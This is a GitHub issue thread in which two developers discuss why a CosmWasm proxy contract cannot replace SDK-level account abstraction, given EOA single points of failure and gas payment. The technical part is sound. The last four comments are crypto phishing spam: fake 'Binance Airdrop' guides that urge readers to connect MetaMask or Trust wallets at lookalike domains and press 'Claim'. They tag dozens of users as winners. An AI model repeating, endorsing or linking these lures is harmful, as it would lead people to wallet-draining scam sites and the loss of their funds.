### ISSUE TITLE
Design Question

### ISSUE THREAD

**Issue by baoskee** [larry0x/abstract-account#9]
Larry, why can't the CW code be like this for key rotation? Why require a change to the CosmosSDK?
```rust
pub fn execute(
  deps: DepsMut,
  env: Env,
  info: MessageInfo,
  msg: ExecuteMsg,
) -> Result<Response, ContractError> {
  match msg {
    ExecuteMsg::ExecuteMsgs { msgs } => {
       let owner = OWNER.load(deps.storage)?;
       if owner != info.sender {
         return Err(ContractError::Unauthorized {});
       }
       Ok(Response::new().add_messages(msgs))
    },
    ExecuteMsg::UpdateOwner { new_addr } => {
      let addr = deps.api.addr_validate(new_addr)?;
      let owner = OWNER.load(deps.storage)?;
      if owner != info.sender {
        return Err(ContractError::Unauthorized {});
      }
      OWNER.save(deps.storage, &addr)?;
      Ok(Response::new())
    }
  } 
}
```

**Comment by larry0x** [comment]
With this design, the contract is just a proxy - it cannot initiate txs on its own. The `owner` account is the one who initiates txs. Two main problems if we do it this way:

- What type of account will `owner` be? Without changes to the sdk, it has to be an EOA because only EOA can initiate txs. The EOA will remain as a single point of failure of the system. We still haven't solved the poor security property of EOA. 

- How will gas fee work? Since it's `owner` who initiates the tx, it will pay the gas fee, but instead we want the smart contract account to pay it.

I think the only way to solve both problems is to actually let smart contract initiate txs, so that no EOA is involved at all.

**Comment by baoskee** [comment]
Gotcha. What if we delegate certain types of messages to other smart contracts to execute? For example, using DaoDao's Core module pattern. 

<img width="736" alt="68747470733a2f2f6261666b7265696433796b3233336b6a7762723263636869646b326f686d356c6179346e693570356a7a746b3433767167743371636c6c6a7674342e697066732e6e667473746f726167652e6c696e6b (1)" src="https://github.com/larry0x/abstract-account/assets/16130434/331d1d18-aaf9-4674-9c9a-225d796ff87e">

Only allowed modules can execute messages. These modules can allow non-owner to execute. For example, for a subscription payments system you would add a "Subscriptions Module" that allows payment vendor to execute a withdraw message every month.

The payment vendor would pay the gas in this example.

**Comment by baoskee** [comment]
> * What type of account will `owner` be? Without changes to the sdk, it has to be an EOA because only EOA can initiate txs. The EOA will remain as a single point of failure of the system. We still haven't solved the poor security property of EOA.

`owner` can just be another smart contract, no? Addresses can be EOA or a smart contract. You can compose really nicely this way.

**Comment by larry0x** [comment]
> owner can just be another smart contract, no?

If owner is also a SC, how will you invoke the owner contract? You always need an EOA to sign a MsgExecuteContract

**Comment by larry0x** [comment]
Btw @baoskee I'm happy to do a call to discuss anything about AA. Doing this asynchronously on Github isn't the most efficient

**Comment by baoskee** [comment]
Yea would love a call. I'll DM you on Telegram.

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @JudeSilas, @calpals, @chrispearcx, @txerife, @gschurck, @akitana-airtanker, @OGalbert, @zergey, @xiaods, @DannySunNYC

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by renmadigi** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @mr-meselmani, @nanchengyuan, @Nesakko, @rcoyner, @junaid-faryad, @moodysalem, @msbolang, @pde-rent, @lukelu520, @Lycodeboy, @phuson, @santospatrick, @freeuser113, @coryetzkorn, @sobowalebukola, @yosa12978, @mastilver, @kamwing, @taofengno1, @cocojoe, @abc0xmattyic333, @iamsingularity, @yj666, @knewbie, @akinwol, @tricknillogy, @ilovejs, @mathieu-bour, @hannah-eichelsdoerfer, @ysnozcn
